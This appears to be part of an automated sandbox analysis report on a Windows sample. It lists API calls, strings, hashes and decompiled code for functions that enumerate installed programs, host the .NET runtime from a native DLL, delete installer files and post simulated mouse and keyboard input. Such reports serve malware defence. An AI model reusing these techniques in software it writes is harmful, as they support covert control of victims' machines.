                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00406C7E
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E639770, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 222COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$char_traitsstd::ios_base::good
                                                                                                                                                    • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
                                                                                                                                                    • API String ID: 661727466-4239264347
                                                                                                                                                    • Opcode ID: d39b2de8fb4649852b10d283144b420ae989c02615edbba54d0f66630d7b23eb
                                                                                                                                                    • Instruction ID: 3d609a35a5ea391d46e1496b0d91c623972948c52545266dbe74768707e8c860
                                                                                                                                                    • Opcode Fuzzy Hash: d39b2de8fb4649852b10d283144b420ae989c02615edbba54d0f66630d7b23eb
                                                                                                                                                    • Instruction Fuzzy Hash: A8B10871C04268EBDB65CBA4CD50BDEBBB8AF59304F1485E9D00AA7240EB345F88DF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6219D0, Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 439memoryregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000003,00000000,00020119), ref: 6E621BC1
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,3920FDCC), ref: 6E621C58
                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,00000000,?,?,?,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,3920FDCC), ref: 6E621C7F
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E621DE4
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E621EC2
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E621EE1
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E621F87
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622003
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6220CD
                                                                                                                                                    • PathMatchSpecW.SHLWAPI(00000000,00000000,000000FF,DisplayName,00000000,00000000,00000000,DisplayName,00000000,00000000,00000000,?,00020019), ref: 6E621D46
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                      • Part of subcall function 6E628070: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,3920FDCC,00020019,00000000,00000000,3920FDCC), ref: 6E6280A8
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E622082
                                                                                                                                                      • Part of subcall function 6E628270: RegCloseKey.ADVAPI32(?), ref: 6E62828E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$MatchPathQuerySpecstd::ios_base::good$Base::CloseConcurrency::details::ContextEnumIdentityInfoQueueValueWork
                                                                                                                                                    • String ID: %s\%s$.exe$DisplayName$DisplayVersion$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                    • API String ID: 320006500-880123811
                                                                                                                                                    • Opcode ID: 02b5046f81a1efe313d5d09e80a9f4dda05477fe59f99de6b80ce494208c8439
                                                                                                                                                    • Instruction ID: 81f6f4ca6c66b417424f9e54168e08bc306b9db4ca27946bfb98a149867a64da
                                                                                                                                                    • Opcode Fuzzy Hash: 02b5046f81a1efe313d5d09e80a9f4dda05477fe59f99de6b80ce494208c8439
                                                                                                                                                    • Instruction Fuzzy Hash: 4512BF70818268DEDB24DFA4CC98BEEB7B8AF15308F1045E9D4196B190EB751F88CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E622640, Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 207memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000000,6E6915D0,3920FDCC), ref: 6E622689
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                    • PathFindExtensionW.SHLWAPI(00000000,00000000), ref: 6E6226A5
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622745
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622769
                                                                                                                                                    • PathFindExtensionW.SHLWAPI(00000000,6E68D940,00000000,?,00000000), ref: 6E622788
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622792
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6227E6
                                                                                                                                                      • Part of subcall function 6E6262B0: _DebugHeapAllocator.LIBCPMTD ref: 6E6262BE
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,6E68D940,00000000,?,00000000), ref: 6E6227F4
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62280F
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622825
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E62284B
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E622865
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62287B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$FindPath$ExtensionFile$DeleteNamestd::ios_base::good
                                                                                                                                                    • String ID: .exe$.msi$\Setup%s$\Setup.exe
                                                                                                                                                    • API String ID: 1668309467-3900291294
                                                                                                                                                    • Opcode ID: ddede8535885299cb0d0d40e9406b69a6fb2422eb9a006f25c2a8ccb50cf7e85
                                                                                                                                                    • Instruction ID: dc041a6aac607badb1e1ee8805f4d71c0b29724369daf362567e1036c8473d98
                                                                                                                                                    • Opcode Fuzzy Hash: ddede8535885299cb0d0d40e9406b69a6fb2422eb9a006f25c2a8ccb50cf7e85
                                                                                                                                                    • Instruction Fuzzy Hash: 08814FB1C14148AFDF04DFE4DC50AEEBBBCAF55318F508929E415AB284EB746A04CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E655B49, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E65A318: GetWindowLongW.USER32(?,000000F0), ref: 6E65A325
                                                                                                                                                    • GetParent.USER32(?), ref: 6E655B85
                                                                                                                                                    • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6E655BA8
                                                                                                                                                    • GetWindowRect.USER32 ref: 6E655BCD
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 6E655BFC
                                                                                                                                                    • MonitorFromWindow.USER32(00000000,00000001), ref: 6E655C35
                                                                                                                                                    • GetMonitorInfoW.USER32 ref: 6E655C3C
                                                                                                                                                    • CopyRect.USER32 ref: 6E655C4A
                                                                                                                                                    • GetWindowRect.USER32 ref: 6E655C57
                                                                                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 6E655C64
                                                                                                                                                    • GetMonitorInfoW.USER32 ref: 6E655C6B
                                                                                                                                                    • CopyRect.USER32 ref: 6E655C79
                                                                                                                                                    • GetParent.USER32(?), ref: 6E655C84
                                                                                                                                                    • GetClientRect.USER32 ref: 6E655C91
                                                                                                                                                    • GetClientRect.USER32 ref: 6E655C9C
                                                                                                                                                    • MapWindowPoints.USER32 ref: 6E655CAA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 3610148278-3887548279
                                                                                                                                                    • Opcode ID: 2cac572e44c9576cde002d07e40e0022f0449011a646325c11572f7667648839
                                                                                                                                                    • Instruction ID: 5b0a35ccfa95c23d0d1ce5b963fe9977bb2ae174a6e15cce2b312347da3ae2dd
                                                                                                                                                    • Opcode Fuzzy Hash: 2cac572e44c9576cde002d07e40e0022f0449011a646325c11572f7667648839
                                                                                                                                                    • Instruction Fuzzy Hash: 7B612C72A4060AAFCF00DFE9C988BEEBBB9BB4A315F150115E516E7280D774A9158B60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62E590, Relevance: 28.7, APIs: 19, Instructions: 156memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E5CE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E5E0
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E5F2
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E604
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E616
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E640
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E652
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E664
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E676
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E688
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E69A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E6AC
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E6BE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E6D0
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E6E2
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E718
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E72A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E73C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62E753
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 571936431-0
                                                                                                                                                    • Opcode ID: 76af52ee7d64f087d2c811ccd55ec63f35fc0916b35a1f83744a5ebccbc4f5b2
                                                                                                                                                    • Instruction ID: 747bc268435b4a67847316c47dca5b25b9dc6ce6874cedf567a8305c28f8edd5
                                                                                                                                                    • Opcode Fuzzy Hash: 76af52ee7d64f087d2c811ccd55ec63f35fc0916b35a1f83744a5ebccbc4f5b2
                                                                                                                                                    • Instruction Fuzzy Hash: C551A374600109EFCB08DF88D990E9D77B5EF8874CB148168E90AAB352C734EE51DF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629FA0, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 190memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(?), ref: 6E629B9A
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629C35
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629CD4
                                                                                                                                                    • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6E62A004
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E62A01A
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(6E623902,00000000,?), ref: 6E62A036
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E62A05A
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(6E623902,00000001,?), ref: 6E62A079
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6E62A1C5
                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(6E623902), ref: 6E62A1CF
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62A1DB
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62A175
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocString$ArraySafe$Element$ClearCreateDestroyVariantVector
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp
                                                                                                                                                    • API String ID: 1364862699-1439456480
                                                                                                                                                    • Opcode ID: e61eeefe674d9e4d2bc76ffbffe885e2093a0cd2e74760a93b2d24d6924a9c4f
                                                                                                                                                    • Instruction ID: 3a8ca84fb3ec3366397f77009f52808edfc7a6b08aa60c0a5cd7341d9c945ad3
                                                                                                                                                    • Opcode Fuzzy Hash: e61eeefe674d9e4d2bc76ffbffe885e2093a0cd2e74760a93b2d24d6924a9c4f
                                                                                                                                                    • Instruction Fuzzy Hash: 1B8118B5910609EFCB04CFE4C948BEEBBB8FF59310F108929E515A7280E7B45A45CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629700, Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 166libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(mscoree.dll,3920FDCC,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446,00000000,6E69F8E0), ref: 6E629734
                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000073,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446,00000000), ref: 6E62976B
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorBindToRuntimeEx), ref: 6E629792
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E6297A1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E6297AE
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E629847
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E6298DA
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E62992A
                                                                                                                                                    Strings
                                                                                                                                                    • mscoree.dll, xrefs: 6E62972F
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629743
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62984D
                                                                                                                                                    • v4.0.30319, xrefs: 6E629832
                                                                                                                                                    • v2.0.50727, xrefs: 6E62980C
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E6297B4
                                                                                                                                                    • CorBindToRuntimeEx, xrefs: 6E629789
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E6298E0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Free$ErrorLast$AddressBase::Concurrency::details::ContextIdentityLoadProcQueueWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$CorBindToRuntimeEx$mscoree.dll$v2.0.50727$v4.0.30319
                                                                                                                                                    • API String ID: 4289075378-1696464217
                                                                                                                                                    • Opcode ID: dfb91b26f46491af3eeae6f75faf59d507781af3c125c752e0309dbf113fe96d
                                                                                                                                                    • Instruction ID: b67824fa6f90836e60d5d0f1c7e7f36dbd0d5107fb5bdc638d040b9e6f4b55f6
                                                                                                                                                    • Opcode Fuzzy Hash: dfb91b26f46491af3eeae6f75faf59d507781af3c125c752e0309dbf113fe96d
                                                                                                                                                    • Instruction Fuzzy Hash: B661C7B5D00209EFCB04DFE4D955BEEBBB9BF49314F104A28E415AB380DB746A41CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64C0D0, Relevance: 27.2, APIs: 18, Instructions: 204windowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(00000000,00000200,00000000,00000000), ref: 6E64C0FB
                                                                                                                                                    • PostMessageW.USER32(00000000,00000200,00000000,00000000), ref: 6E64C12A
                                                                                                                                                    • PostMessageW.USER32(00000000,000002A1,00000000), ref: 6E64C158
                                                                                                                                                    • PostMessageW.USER32(00000000,000002A1,00000000), ref: 6E64C186
                                                                                                                                                    • PostMessageW.USER32(00000000,00000201,00000001), ref: 6E64C1C0
                                                                                                                                                    • PostMessageW.USER32(00000000,00000201,00000001,00000000), ref: 6E64C1EF
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,6E64C099,00000000,?,?,00000001,00000000), ref: 6E64C1F7
                                                                                                                                                    • PostMessageW.USER32(00000000,00000202,00000001), ref: 6E64C225
                                                                                                                                                    • PostMessageW.USER32(00000000,00000202,00000001), ref: 6E64C253
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000020,00000000), ref: 6E64C266
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000020,00000000), ref: 6E64C279
                                                                                                                                                    • PostMessageW.USER32(00000000,00000204,00000002,?), ref: 6E64C2AC
                                                                                                                                                    • PostMessageW.USER32(00000000,00000204,00000002), ref: 6E64C2DA
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,6E64C099,00000000,?,?,00000001,00000000), ref: 6E64C2E2
                                                                                                                                                    • PostMessageW.USER32(00000000,00000205,00000002,00000000), ref: 6E64C311
                                                                                                                                                    • PostMessageW.USER32(00000000,00000205,00000002), ref: 6E64C33F
                                                                                                                                                    • PostMessageW.USER32(00000000,000002A3,00000000,00000000), ref: 6E64C352
                                                                                                                                                    • PostMessageW.USER32(00000000,000002A3,00000000,00000000), ref: 6E64C365
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2128022084-0
                                                                                                                                                    • Opcode ID: 5862b8adb32f31c5fe61dbe19a49dadfe09667dffbede889161cae9b63bf6633
                                                                                                                                                    • Instruction ID: ee13ea4eaaa9fa5c91b1a496783233e6f5bf594ebe468da812b77d05952cbbf7
                                                                                                                                                    • Opcode Fuzzy Hash: 5862b8adb32f31c5fe61dbe19a49dadfe09667dffbede889161cae9b63bf6633
                                                                                                                                                    • Instruction Fuzzy Hash: 8861D3712507667BFB24DF55CC4AF7A3762EF86702F508138BA969F2C1C6B8D8009764
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, signed int _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t72;
				struct HBRUSH__* _t92;
				struct HFONT__* _t99;
				long _t107;
				signed int _t113;
				signed int _t129;
				struct HDC__* _t131;
				intOrPtr _t133;

				if(_a8 == 0xf) {
					_t133 =  *0x47eabc;
					_t72 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t72;
					GetClientRect(_a4,  &_v32);
					_t129 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t129) {
						_t113 = _t129 - _v32.top;
						asm("cdq");
						_a12 = _t113;
						_a16 = ((( *(_t133 + 0x52) & 0x000000ff) * _t113 + ( *(_t133 + 0x56) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff) << 8;
						asm("cdq");
						asm("cdq");
						_v16.lbColor = (_a16 | (( *(_t133 + 0x51) & 0x000000ff) * _t113 + ( *(_t133 + 0x55) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff) << 0x00000008 | (( *(_t133 + 0x50) & 0x000000ff) * _a12 + ( *(_t133 + 0x54) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff;
						_t92 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t92;
						FillRect(_a8,  &_v32, _t92);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t133 + 0x58) != 0xffffffff) {
						_t99 = CreateFontIndirectW( *(_t133 + 0x34));
						_a16 = _t99;
						if(_t99 != 0) {
							_t131 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t131, 1);
							SetTextColor(_t131,  *(_t133 + 0x58));
							_a8 = SelectObject(_t131, _a16);
							DrawTextW(_t131, 0x476aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t131, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t107 = _a16;
